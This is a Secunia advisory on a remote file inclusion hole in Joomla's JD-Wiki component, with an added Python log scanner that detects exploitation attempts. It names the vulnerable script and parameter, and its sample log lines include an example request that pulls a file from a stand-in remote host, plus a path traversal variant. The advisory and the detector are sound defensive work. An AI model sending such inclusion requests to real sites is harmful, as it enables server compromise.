Joomla JD-Wiki Component File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA21389

VERIFY ADVISORY:
http://secunia.com/advisories/21389/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
JD-Wiki 1.x (component for Joomla)
http://secunia.com/product/11256/

DESCRIPTION:
jank0 has reported a vulnerability in the JD-Wiki component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
components/com_jd-wiki/lib/tpl/default/main.php is not properly
verified before it is used to include files. This can be exploited
to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.
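
For administrators checking whether an unpatched installation was probed, the following added example (not part of the Secunia advisory or of JD-Wiki) scans web server access logs for requests that set "mosConfig_absolute_path" on the affected script. The combined log format, the function names and the sample lines are assumptions made for illustration; the script path and parameter name come from the description above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter name are taken from the advisory text.
SCRIPT = "components/com_jd-wiki/lib/tpl/default/main.php"
PARAM = "mosconfig_absolute_path"

# Client, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def classify(value):
    """Label the supplied parameter value as remote URL, local path, or other."""
    v = unquote(value).strip().lower()  # second decode catches double encoding
    if re.match(r"^[a-z][a-z0-9+.\-]*://", v):
        return "remote"
    if v.startswith(("/", "\\")) or ".." in v or re.match(r"^[a-z]:[\\/]", v):
        return "local"
    return "other"

def find_hits(lines):
    """Return (client, status, kind) for each request that sets PARAM on SCRIPT."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not unquote(parts.path).lower().endswith(SCRIPT):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() == PARAM:
                hits.append((client, int(status), classify(value)))
    return hits

# Constructed sample lines using documentation addresses; not real traffic.
SAMPLE = [
    '198.51.100.7 - - [10/Aug/2006:10:01:02 +0000] "GET /components/com_jd-wiki/'
    'lib/tpl/default/main.php?mosConfig_absolute_path=http://example.invalid/x.txt? '
    'HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Aug/2006:10:05:40 +0000] "GET /components/com_jd-wiki/'
    'lib/tpl/default/main.php?mosConfig_absolute_path=..%2F..%2F..%2Ftmp%2F '
    'HTTP/1.1" 404 210',
    '192.0.2.15 - - [10/Aug/2006:10:06:00 +0000] "GET /index.php?option=com_jd-wiki '
    'HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```

Access logs record only the query string; with "register_globals" enabled the same variable can also arrive in a POST body or a cookie, so an empty result does not rule out an attempt.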

SOLUTION:
Update to version 1.0.3:
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomladeveloping/frs.joomla_1_0_x.components/frs6415?dl=1

PROVIDED AND/OR DISCOVERED BY:
jank0

ORIGINAL ADVISORY:
http://www.joomladeveloping.org/component/option,com_jd-wp/Itemid,29/p,33/
http://milw0rm.com/exploits/2125
